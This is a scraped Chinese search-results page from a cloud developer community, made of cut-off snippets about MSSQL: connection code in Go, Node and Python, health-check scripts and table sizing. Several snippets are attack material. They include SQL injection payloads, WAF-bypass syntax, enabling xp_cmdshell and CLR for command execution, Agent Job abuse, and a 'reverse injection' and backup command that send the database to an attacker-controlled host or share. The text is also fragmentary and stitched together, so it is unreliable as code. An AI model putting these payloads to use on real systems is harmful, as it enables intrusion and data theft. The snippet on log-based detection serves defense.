展开

关键词

mssql 获取表空间大小

create table #Data(name varchar(100),row varchar(100),reserved varchar(100),data...

55150

MSSQL 数据库限制值

后台能登陆,证明服务器、程序、数据库三方都稳定的啊。。那真是百思不得其解,但由于当时又身处外地,找电脑远程登陆服务器看情况也不容易。。 后来千辛万苦,凭个人口(颜)才(值)和金钱;找了台电脑登陆上去;一看好家伙竟然提示因为 'PRIMARY' 文件组已满和数据库满的提示。明明服务器空间还有的,为啥呢? alter database 库名 add file(NAME = 逻辑文件名,FILENAME = 'c:实际文件名.ndf') 2、检查看看那个数据表要的空间最多,删除无需要的数据 SELECT WHERE indid = 1 AND status = 2066 -- status='18' ORDER BY reserved DESC 暂时解决问题吧,其实最好的办法是升级数据库的版本

25210
  • 广告
    关闭

    腾讯云图限时特惠0.99元起

    腾讯云图是一站式数据可视化展示平台,旨在帮助用户快速通过可视化图表展示大量数据,低门槛快速打造出专业大屏数据展示。新用户0.99元起,轻松搞定数据可视化

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    golang链接mssql数据库挖坑,填坑

    不过这个可以连接到我的mssql.先凑合着用吧。        之前链接到mysql ,tdib 都是好好的,mssql咋这么不靠谱了。 ``` type Mssql struct { *sql.DB dataSource string database   string windows    bool sa         SA } type SA struct { user   string passwd string } func (m *Mssql) Open() (err error) { var conf [] 必须设置sa账号和密码 windows: false, sa: SA{ user:   "hdsdfsd04021", passwd: "sdf516A", }, } // 连接数据库 ", cfg.Cfg["mssql"]) var userid int32 var username string var userpassword string var userguid

    82560

    mssql注入

    xp_ntsec_enumdomains 枚举域名相关信息 xp_terminate_process 终端进程和ip啦 xp_logininfo 当前登录帐号 sp_configure 检索数据库中的内容 (我觉得这个挺有用的) sp_helpextendedproc 得到所有的存储扩展 sp_who2 查询用户,他们登录的主机,他们在数据库中执行的操作等等 一些网络信息 exec xp_regread declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat ,name=test;-- 当前数据库就备份到你的硬盘上了 请使用 sp_addrolemember 将成员添加到固定数据库角色或用户定义的角色。 不能在用户定义的事务内执行 sp_addsrvrolemember 存储过程。 位置 DBPROP_INIT_LOCATION 要连接的数据库的位置。 扩展属性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的连接字符串。

    69280

    WAF Bypass数据库特性(MSsql探索篇)

    0x01前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过 1.e这样的形式,我曾用它绕过了D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSsql特性。 admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和union之间的位置 (1)空白字符 Mssql 数据库特性,如果有时间的话,你不妨也动动手,亲手去Fuzz一下,你可能会发现更多的特性。

    79310

    NodeJS中使用mssql模块连接SQLServer数据库

    最近看了下NodeJS下连接SQLServer的一些示例,发现NodeJs中有两个模块,一个是mssql,其npm地址是:https://www.npmjs.com/package/mssql;另外一个是 在Navicat Premium 12中连接SQLServer数据库后,创建一个数据库比如说UserDB,再为它一个t_user表,其结构如下图所示: ? [t_user] VALUES (N'小丽', N'22', N'0') GO 2、使用mssql模块连接SQLServer数据库 // mssql模块的简单使用 // https://www.npmjs.com /package/mssql var sql = require('mssql'); // DB configuration var dbConfig = { user: 'sa', password Express中集成数据库比较方便,具体可参考Express中文网的数据库集成:Express-Database integration

    4.9K31

    MSSQL 数据库 - SQL Server2019创建数据库并关联表空间、启用快照隔离级别实例演示,使用MSSM工具创建数据库

    右键数据库列表点击创建数据库。 首先在常规里填写一个数据库名称。 然后在文件组里添加需要关联的表空间名。 回到常规里,添加两个物理逻辑文件引用刚才添加的表空间,后面表空间的数据就会存储到对应的文件里。 设置好后点击确定数据库就创建完了。

    12110

    JSW - 基于WEB的MSSQL数据库查询平台

    一般做法都是: 通过数据库账号限制查询人员、限制查询的表和字段。但不好统计开发人员都查询了什么数据 使用跳板机,所有查询都要在跳板机上进行。进出跳板机数据文件要过审查机制。 我们想使用第三级,但能支持的数据库只有MySql没有发现能支持微软SqlServer的。本项目就是在这个基础上进行开发的。 目前支持的功能列表 多账号登录,强制二次验证【OTP】保证登录的安全。 查询的目标数据库支持SqlServer和MySql。 使用druid数据库连接池 数据库记录每次SQL执行脚本,并限制返回的结果数量 支持查询结果的csv格式导出 脚本输入框语法高亮,智能提醒 存储过程查看,表数据大小快速查看 项目部署 环境安装 本项目使用 我们返回前台,看看主界面,主界面分为左右两部分,左侧主要为数据库和表的导航。右侧主要为SQL语句书写区,执行结果展示区。

    11610

    MSSQL日志安全分析技巧

    常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。 0x01 MSSQL日志分析 首先,MSSQL数据库应启用日志记录功能,默认配置仅限失败的登录,需修改为失败和成功的登录,这样就可以对用户登录进行审核。 ? 通过查看数据库中最近新建的表的结构和内容,可以判断是否发生过sql注入漏洞攻击事件。 检查方法: 1、数据库表检查 ? 2、检查xp_cmdshell等存储过程 xp_cmdshell在mssql2005之后的版本中是默认禁止的,查看xp_cmdshell是否被启用。

    58630

    #安卓开发# B4A 连接mssql 数据库

    引用类库 mssql(1.0.1) javaobject 连接mssql代码 Sub Process_Globals Public ms_sql As MSSQL End Sub Public Sub cn_sql As Boolean Try gbyg ms_sql.setDatabase("数据库地址","数据库名","数据库用户名","数据库用户密码 Activity.LoadLayout("main") If FirstTime Then If code_sql.cn_sql Then ToastMessageShow("数据库连接成功 ,False) Else ToastMessageShow("数据库连接失败!"

    1.1K20

    复习 - MSSQL注入

    MSSQL MSSQL和MySQL注入类似,但在数据结构特定函数名称上存在差异。 且MSSQL与Windows平台的高契合度,使其可以使用Windows身份验证,导致其运行权限较高,若没有对权限进行限制,当存在SQL注入时,所造成的后果一般比MySQL更严重。 and @@VERSION like '%14%'; -- 数据库名 select DB_NAME() -- 当前数据库 select DB_NAME(N) -- 这里的N指的是第几个数据库,如 该表是一个系统视图,用于存放该数据库内创建的所有对象,如约束、默认值、日志、规则等,而XType代表对象的类型。 ,位于Web端 Host_name数据库系统名,位于数据库端 -- 若正常回显则站库不分离,反之分离 1' and ((select host_name()) = (select @@SERVERNAME

    9610

    MSSQL反弹注入获取迅达娱乐数据库信息数据

    大家好我是sarizs,今天分享一个MSSQL数据的反弹注入获取数据库数据到本地,这技术分享适合才开始学习sql注入的小白(大佬绕过)。 既然要反弹注入我们需要有一个反弹的MSSQL数据库对象,这里我使用中国香港云的虚拟主机   使用URL:http://www.webweb.com 这里我们去创建一个表用来接收反弹过来的数据信息 http://x.x.x.x/MSSQL/? ,在反弹注入中我们要想了解MSSQL的一个函数opendatasource 这是MSSQL的夸库查询我们要反弹注入必须的确保这个函数是开启的 我们开始构建语句 ;insert into opendatasource 这里mssql反弹注入就介绍到这里有什么疑惑和问题欢迎大家留言。

    38350

    数据库巡检】支持Oracle、MySQL、MSSQL、PG等17种数据库

    脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql和DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql是SQL Server脚本,存在部分DDL和DML操作,执行后会产生 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql最低支持2005版本,而脚本DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql最低支持2008R2版本。 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql和DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql是SQL Server脚本,存在部分DDL和DML操作,执行后会产生 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql最低支持2005版本,而脚本DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql最低支持2008R2版本。 3.1、命令行方式 -- 在本机直接运行 sqlcmd -d tempdb -y 0 -m 1 -i D:\DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql -o D:\MSSQL_CHECK_LHR

    9010

    MSSQL横向移动

    这篇博客文章介绍了如何通过MSSQL CLR自动执行横向移动,而无需接触磁盘*或不需要XP_CMDSHELL,以及如何防止和检测到这种情况。 为实现命令执行而对MSSQL服务进行后期开发通常会利用XP_CMDSHELL存储过程在MSSQL进程的上下文中运行操作系统命令。 sp_configure 'show advanced options',1;RECONFIGURE 启用CLR: sp_configure 'clr enabled',1;RECONFIGURE; 将将程序集存储在其中的数据库配置为可信的 ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY ON; 有趣的是,默认情况下,似乎已向MSDB数据库授予TRUSTWORTHY权限,这可能会否定此要求 或者,有一个选项可以根据提供的SHA512散列专门向单个程序集授予UNSAFE权限,而不是将整个数据库标记为受信任。对于SQL Server 2017及更高版本,该过程将如下所示。

    23210

    MSSQL利用总结

    options',1 reconfigure go sp_configure 'xp_cmdshell',1 reconfigure go 执行 exec xp_cmdshell "whoami" //在mssql 沙盒执行 需要当前mssql用户有写注册表权限 开启 exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure RECONFIGURE GO -- Enable clr on the server sp_configure 'clr enabled',1 RECONFIGURE GO 遇到权限问题,需要设置数据库拥有者为 sa,这个方法不能使用master数据库来执行查询语句 alter database [数据库名] set TRUSTWORTHY on EXEC sp_changedbowner 'sa' 接着执行 ,在mssql里查询 ?

    73430

    数据库巡检】支持Oracle、MySQL、MSSQL、PG等11种数据库

    脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql和DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql是SQL Server脚本,存在部分DDL和DML操作,执行后会产生 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql最低支持2005版本,而脚本DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql最低支持2008R2版本。 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql和DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql是SQL Server脚本,存在部分DDL和DML操作,执行后会产生 脚本DB_MSSQL_HC_lhr_v7.0.0_2005.sql最低支持2005版本,而脚本DB_MSSQL_HC_lhr_v7.0.0_2008R2.sql最低支持2008R2版本。 五、其它问题 请看视频《小麦苗数据库健康检查脚本使用说明.wmv》或阅读《【DB健康巡检(Oracle+MySQL+MSSQL+OS)】小麦苗巡检脚本使用说明_LHR.pdf》,下载地址为:https:

    20320

    MSSQL手工注入总结

    之前搞mssql数据库的注入都是直接跑工具,但是总是有些注入点工具一扫就崩,关键时候还是要手工注入,因此总结学习mssql手工注入,写此文留作笔记。本次主要总结显错注入! payload: ? Id=admin' and 1=convert(int,(sql语句)) AND 'CvNI'='CvNI 基本信息获取 数据库信息获取 1=convert(int,(db_name()))  #获取当前数据库名 1=convert(int,(@@version))  #获取数据库版本 1=convert(int,(select quotename(name) from master..sysdatabases (int,(select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库 爆数据 1=(select top 1 * from [数据库名]..

    1.3K20

    干货 | MSSQL 注入攻击与防御

    2012%'; 数据库当前用户 ? 接收多条数据 临时表 除了上述的查询方式在MSSQL中可以使用临时表来查看数据,步骤如下 //1.创建临时表/列和插入数据:BEGIN DECLARE @test varchar(8000) SET @ @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);-- MSSQL 然后执行: SELECT * FROM OPENROWSET('SQLOLEDB', '数据库地址';'数据库用户名';'数据库密码', 'SET FMTONLY OFF execute master. Agent Job 关于Agent job执行命令的这种情况是需要开启了MSSQL Agent Job服务才能执行,这里列出命令,具体的原理在安全客已经有过总结 USE msdb;EXEC dbo.sp_add_job

    36540

    nodejs封装mssql

    mssql操作Sqlserver数据库的基本封装: 记录一下: /** * Created by chaozhou on 2015/9/18. */ var mssql = require('mssql ); } else if (typeof params[index] == "string") { ps.input(index, mssql.NVarChar ); } else if (typeof params[index] == "string") { ps.input(index, mssql.NVarChar insert into dbo.tags(id,name) values(@id,@name) var ps = new mssql.PreparedStatement(connection); ); } else if (typeof addObj[index] == "string") { ps.input(index, mssql.NVarChar

    1.7K00

    Python操作MSSQL

    Python连接SQL Server数据库 - pymssql使用基础:https://www.cnblogs.com/baiyangcao/p/pymssql_basic.html 廖雪峰官网 之 Python 访问数据库(SQLLite / MySQL / SQLAlchemy) pymssql examples :http://pymssql.org/en/stable/pymssql_examples.html python-整理--连接MSSQL:https://www.cnblogs.com/mirrortom/p/5218865.html Python 操作SQLServer 需要使用 pymssql 安装成功后,使用如下语句和 MSSql 数据库交互。 ( pymssql 需要安装 Cython:https://pypi.org/project/Cython   和   freetds:linux下利用freetds 访问sqlserver数据库  )

    1.6K20

    相关产品

    • 云数据库 SQL Server

      云数据库 SQL Server

      腾讯云数据库 SQL Server 是业界最常用的商用数据库之一, 拥有微软正版授权,避免未授权使用软件的风险。支持复杂的 SQL 查询,性能优秀,对基于 Windows 平台 .NET 架构的应用程序具有完美的支持。同时具有即开即用、稳定可靠、安全运行、弹性扩缩等特。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券